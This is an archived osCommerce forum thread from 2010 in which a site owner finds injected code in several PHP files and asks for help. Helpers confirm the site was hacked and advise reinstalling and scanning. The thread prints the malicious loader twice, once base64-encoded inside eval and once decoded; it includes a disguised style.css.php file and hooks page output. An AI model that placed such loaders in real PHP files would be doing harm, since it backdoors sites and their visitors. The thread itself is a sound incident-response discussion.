xprt007 Posted March 25, 2010 Share Posted March 25, 2010 Hi I noticed some strange code I dont rfemember seeing before at the top of some files I opened, including applicatio_top.php & column_right.php. Here is a sample: <?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL2FmcmlxdWUxL3B1YmxpY19odG1sL2RydXBhbC9zaXRlcy9kZWZhdWx0L21vZHVsZXMvaW1hZ2UvY29udHJpYi9pbWFnZV9nYWxsZXJ5L3ZpZXdzL3RoZW1lL3N0eWxlLmNzcy5waHAnO2lmKGZpbGVfZXhpc3RzKCRHTE9CQUxTWydtZnNuJ10pKXtpbmNsdWRlX29uY2UoJEdMT0JBTFNbJ21mc24nXSk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtvYl9zdGFydCgnZGdvYmgnKTt9fX0=')); ?> Is it normal & if not, would it mean the site was hacked? Thanks in advance & regards. Link to comment Share on other sites More sharing options...
knifeman Posted March 25, 2010 Share Posted March 25, 2010 answer secure my site Link to comment Share on other sites More sharing options...
Guest Posted March 25, 2010 Share Posted March 25, 2010 I noticed some strange code I dont rfemember seeing before at the top of some files I opened, including applicatio_top.php & column_right.php. Is it normal & if not, would it mean the site was hacked? You have been hacked. Her is the code: if(function_exists('ob_start')&&!isset($GLOBALS['mfsn'])){$GLOBALS['mfsn']='/home/afrique1/public_html/drupal/sites/default/modules/image/contrib/image_gallery/views/theme/style.css.php';if(file_exists($GLOBALS['mfsn'])){include_once($GLOBALS['mfsn']);if(function_exists('gml')&&function_exists('dgobh')){ob_start('dgobh');}}} Link to comment Share on other sites More sharing options...
xprt007 Posted March 30, 2010 Author Share Posted March 30, 2010 Thanks for your very informative responses. That is no good news as it means practically spending lots of hours of extra work on a site that was going to be handed over to a client. Is this just bad luck to have been hacked at this time or Oscommerce is that vulnerable? If this particular vulnerability is known, why are there no better defenses or the suggested measures above not applied to the code? Anyway, I don't know Oscommerce enough to criticize it. I'm more at home with Drupal CMS & there such issues are handled differently. Since all php files, including those outside Oscommerce in other folders have been infected, I think I will begin by deleting everything. I have Drupal CMS in another folder which has also been infected. >_< :blink: :'( If I have more questions ... Once again, thanks & regards :thumbsup: Link to comment Share on other sites More sharing options...
Guest Posted March 30, 2010 Share Posted March 30, 2010 Since all php files, including those outside Oscommerce in other folders have been infected, I think I will begin by deleting everything. I have Drupal CMS in another folder which has also been infected. If I have more questions ... Once again, thanks & regards You can also try this contribution: osCommerce VTS It's an Virus & Threat Scanner for osCommerce that can help you find infected files if you want to.. Link to comment Share on other sites More sharing options...
xprt007 Posted March 30, 2010 Author Share Posted March 30, 2010 You can also try this contribution: osCommerce VTS It's an Virus & Threat Scanner for osCommerce that can help you find infected files if you want to.. Hi I am on shared server. As I see in the readme file, the script works there as well. Apart from scanning, what does it do? Can it delete the located bad files? In my case, it seems all the thousands of Oscommerce & those in other folders with complete scripts/sites, such as the mentioned Drupal site have apparently already been infected & have to be cleaned or deleted & replaced. How would this help me at this stage? I'm sure it is worth having AFTER the clean up. Thanks & regards Link to comment Share on other sites More sharing options...
Guest Posted March 31, 2010 Share Posted March 31, 2010 Hi I am on shared server. As I see in the readme file, the script works there as well. Apart from scanning, what does it do? Can it delete the located bad files? In my case, it seems all the thousands of Oscommerce & those in other folders with complete scripts/sites, such as the mentioned Drupal site have apparently already been infected & have to be cleaned or deleted & replaced. How would this help me at this stage? I'm sure it is worth having AFTER the clean up. Thanks & regards It does nothing more than scan and report possible threats in your files. You have to manually erase files or code from files. If hundreds or thousands of files are infected, then erase your whole site and reinstall from earlier backups. If you dont have up to date backups it could be worth trying this contribution.. Link to comment Share on other sites More sharing options...
xprt007 Posted March 31, 2010 Author Share Posted March 31, 2010 I have another question: Is the database also infected by this code? :rolleyes: In that case, I would just delete the files, upload new oscommerce files ... Link to comment Share on other sites More sharing options...
Guest Posted March 31, 2010 Share Posted March 31, 2010 I have another question: Is the database also infected by this code? In that case, I would just delete the files, upload new oscommerce files ... Normally it is not. The code you showed us does not alter the database. You should do a scan and see if there is more.. Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.